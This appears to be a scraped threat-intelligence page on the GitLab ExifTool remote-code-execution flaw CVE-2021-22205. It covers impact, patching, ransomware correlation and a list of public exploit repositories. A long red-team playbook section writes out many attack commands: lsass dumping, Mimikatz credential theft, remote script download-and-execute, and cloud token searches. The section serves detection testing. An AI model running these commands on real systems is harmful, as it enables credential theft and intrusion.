CVE-2021-22205
Overview
This vulnerability is a remote command execution flaw caused by improper validation of image files processed by a file parser component within GitLab CE/EE. The root cause lies in insufficient input validation, allowing specially crafted image files to trigger unsafe code execution paths. The affected component is the image file handling mechanism introduced since version 11.9, which fails to correctly sanitize or verify image content prior to parsing.
Vulnerability Description
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Impact
An unauthenticated attacker can execute arbitrary system commands on the vulnerable GitLab server by submitting crafted image files, leading to full system compromise. This includes the ability to read, modify, or delete data, install malware, or pivot within the network. No user interaction or valid credentials are required, enabling remote exploitation over the network. The business impact includes potential data breaches, disruption of development workflows, and loss of control over critical infrastructure.
Solution
GitLab has released security updates addressing this vulnerability in versions subsequent to 11.9; users must upgrade to the latest patched versions as detailed in the official GitLab advisory at https://gitlab.com/gitlab-org/gitlab/-/issues/327121. The advisory provides specific version numbers containing the fix and instructions for upgrading both Community and Enterprise editions. No alternative workarounds are recommended; applying the vendor-provided patches is essential to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
cerberimposter
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability has been identified in GitLab Community Edition (CE) and Enterprise Edition (EE) that affects all versions starting from 11.9. This issue arises from improper validation of image files processed by a file parser within the application. When an attacker uploads a maliciously crafted image file, the application fails to adequately check the file's contents, allowing the execution of arbitrary commands on the server. This flaw is particularly concerning due to the widespread use of GitLab for version control and collaboration in software development, making it a tempting target for malicious actors seeking to exploit its capabilities.
The primary attack vector for this vulnerability involves the upload feature of GitLab, where users can submit image files as part of their project documentation or issue tracking. An attacker could exploit this by crafting a specially designed image file that, when processed by the application, triggers the execution of unauthorized commands. This could lead to a complete compromise of the server, allowing the attacker to manipulate files, access sensitive data, or even pivot to other systems within the network. Given the nature of GitLab as a collaborative platform, the potential for lateral movement within an organization’s infrastructure is significant, heightening the risk associated with this vulnerability.
The real-world implications of this vulnerability are severe, particularly for organizations that rely on GitLab for critical development operations. A successful exploitation could result in data breaches, loss of intellectual property, and significant operational disruptions. The financial impact could be substantial, with costs arising from incident response, system recovery, and potential regulatory fines if sensitive data is exposed. Furthermore, the reputational damage inflicted on an organization due to a publicized breach could lead to loss of customer trust and long-term business consequences. As such, the business risk associated with this vulnerability cannot be overstated.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, they should ensure that they are running the latest version of GitLab, as updates often contain patches for known vulnerabilities. Regularly reviewing security advisories and applying updates promptly is crucial in maintaining a secure environment. Additionally, organizations should consider implementing file upload restrictions, such as limiting the types of files that can be uploaded or employing additional scanning tools to analyze uploaded files for malicious content. Monitoring server logs for unusual activity related to file uploads can also aid in early detection of potential exploitation attempts.
In conclusion, the vulnerability present in GitLab CE and EE highlights the critical need for robust security practices in software development environments. The potential for remote command execution through improper file validation poses significant risks to organizations, necessitating proactive measures to safeguard against exploitation. By staying informed about vulnerabilities, applying timely updates, and employing comprehensive security strategies, organizations can mitigate the risks associated with this and similar vulnerabilities, ensuring the integrity and security of their development processes.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-22205, accompanied by a near-maximal increase in the EPSS score, reflecting heightened attacker interest and likelihood of successful exploitation. This surge coincides with the confirmed use of this vulnerability by ransomware operators, specifically the cerberimposter group, underscoring its operationalization in active campaigns. Additionally, new proof-of-concept exploit scripts have emerged, broadening the accessibility of attack tools to a wider range of threat actors and potentially lowering the barrier for exploitation. These developments collectively elevate the threat level, signaling that defenders should anticipate increased targeting of vulnerable GitLab instances. The evolving exploit landscape and ransomware associations indicate a shift from theoretical risk to active exploitation, intensifying the urgency for vigilant monitoring and response.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-22205, accompanied by an expansion in the variety and sophistication of publicly available proof-of-concept exploits. This proliferation of diverse exploit tools, including those adapted for broader platform compatibility, lowers the technical barrier for threat actors and increases the likelihood of opportunistic attacks. Concurrently, telemetry indicates ongoing ransomware campaigns leveraging this vulnerability, with associated groups maintaining active operations. These developments collectively elevate the threat posture from a controlled risk to a more imminent and pervasive danger, underscoring the necessity for heightened vigilance in monitoring and defense against exploitation attempts targeting vulnerable GitLab environments.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
|
|
|
Gitlab | Gitlab | All |
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
GitLab Unauthenticated Remote ExifTool Command Injection
exploits/multi/http/gitlab_exif_rce
|
William Bowling, jbaines-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) | Jacob Baines | webapps | ruby | - | View |
GitHub PoCs (27)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Al1ex/CVE-2021-22205
CVE-2021-22205& GitLab CE/EE RCE
|
Al1ex | 284 | 99 | 2021-10-29 | View |
|
inspiringz/CVE-2021-22205
GitLab CE/EE Preauth RCE using ExifTool
|
inspiringz | 238 | 41 | 2021-11-11 | View |
|
mr-r3bot/Gitlab-CVE-2021-22205
|
mr-r3bot | 181 | 42 | 2021-06-05 | View |
|
XTeam-Wing/CVE-2021-22205
Pocsuite3 For CVE-2021-22205
|
XTeam-Wing | 86 | 26 | 2021-10-28 | View |
|
r0eXpeR/CVE-2021-22205
CVE-2021-22205 Unauthorized RCE
|
r0eXpeR | 69 | 27 | 2021-10-28 | View |
|
whwlsfb/CVE-2021-22205
CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用
|
whwlsfb | 23 | 13 | 2021-10-30 | View |
|
c0okB/CVE-2021-22205
CVE-2021-22205 RCE
|
c0okB | 13 | 7 | 2021-10-31 | View |
|
keven1z/CVE-2021-22205
CVE-2021-22205 检测脚本,支持getshell和命令执行
|
keven1z | 12 | 3 | 2022-07-20 | View |
|
ZZ-SOCMAP/CVE-2021-22205
Gitlab CE/EE RCE 未授权远程代码执行漏洞 POC && EXP CVE-2021-22205
|
ZZ-SOCMAP | 7 | 4 | 2021-10-29 | View |
|
faisalfs10x/GitLab-CVE-2021-22205-scanner
|
faisalfs10x | 6 | 1 | 2021-11-09 | View |
|
runsel/GitLab-CVE-2021-22205-
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution
|
runsel | 3 | 1 | 2021-11-05 | View |
|
pizza-power/Golang-CVE-2021-22205-POC
A CVE-2021-22205 Gitlab RCE POC written in Golang
|
pizza-power | 3 | 1 | 2021-11-25 | View |
|
shang159/CVE-2021-22205-getshell
CVE-2021-22205-getshell
|
shang159 | 3 | 0 | 2021-11-01 | View |
|
findneo/GitLab-preauth-RCE_CVE-2021-22205
PoC in single line bash
|
findneo | 2 | 1 | 2021-10-30 | View |
|
momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-
GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) cve-2021-22205
|
momika233 | 1 | 2 | 2022-04-18 | View |
|
w0x68y/Gitlab-CVE-2021-22205
CVE-2021-22205 的批量检测脚本
|
w0x68y | 1 | 1 | 2021-12-22 | View |
|
DIVD-NL/GitLab-cve-2021-22205-nse
NSE script to fingerprint if GitLab is vulnerable to cve-2021-22205-nse
|
DIVD-NL | 1 | 0 | 2021-11-27 | View |
|
NukingDragons/gitlab-cve-2021-22205
A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab
|
NukingDragons | 1 | 0 | 2023-11-01 | View |
|
devdanqtuan/CVE-2021-22205
CVE-2021-22205& GitLab CE/EE RCE
|
devdanqtuan | 0 | 1 | 2021-11-04 | View |
|
overgrowncarrot1/DejaVu-CVE-2021-22205
|
overgrowncarrot1 | 0 | 1 | 2023-08-02 | View |
|
K3ysTr0K3R/CVE-2021-22205
CVE-2021-22205 - GitLab Unauthenticated Remote Code Execution
|
K3ysTr0K3R | 0 | 0 | 2026-06-24 | View |
|
hh-hunter/cve-2021-22205
|
hh-hunter | 0 | 0 | 2021-11-05 | View |
|
hhhotdrink/CVE-2021-22205
|
hhhotdrink | 0 | 0 | 2023-02-27 | View |
|
sei-fish/CVE-2021-22205
|
sei-fish | 0 | 0 | 2023-03-09 | View |
|
Hikikan/CVE-2021-22205
|
Hikikan | 0 | 0 | 2023-09-08 | View |
|
cc3305/CVE-2021-22205
CVE-2021-22205 exploit script
|
cc3305 | 0 | 0 | 2024-05-19 | View |
|
ccordeiro/CVE-2021-22205
CVE-2021-22205& GitLab CE/EE RCE
|
ccordeiro | 0 | 0 | 2025-11-19 | View |
Ransomware Groups 1
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22205 |
| hackerone.com |
GitHub CVE
x_refsource_MISC
|
https://hackerone.com/reports/1154542 |
| gitlab.com |
GitHub CVE
x_refsource_MISC
|
https://gitlab.com/gitlab-org/gitlab/-/issues/327121 |
| gitlab.com |
GitHub CVE
x_refsource_CONFIRM
|
https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164994/GitLab-13.10.2-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
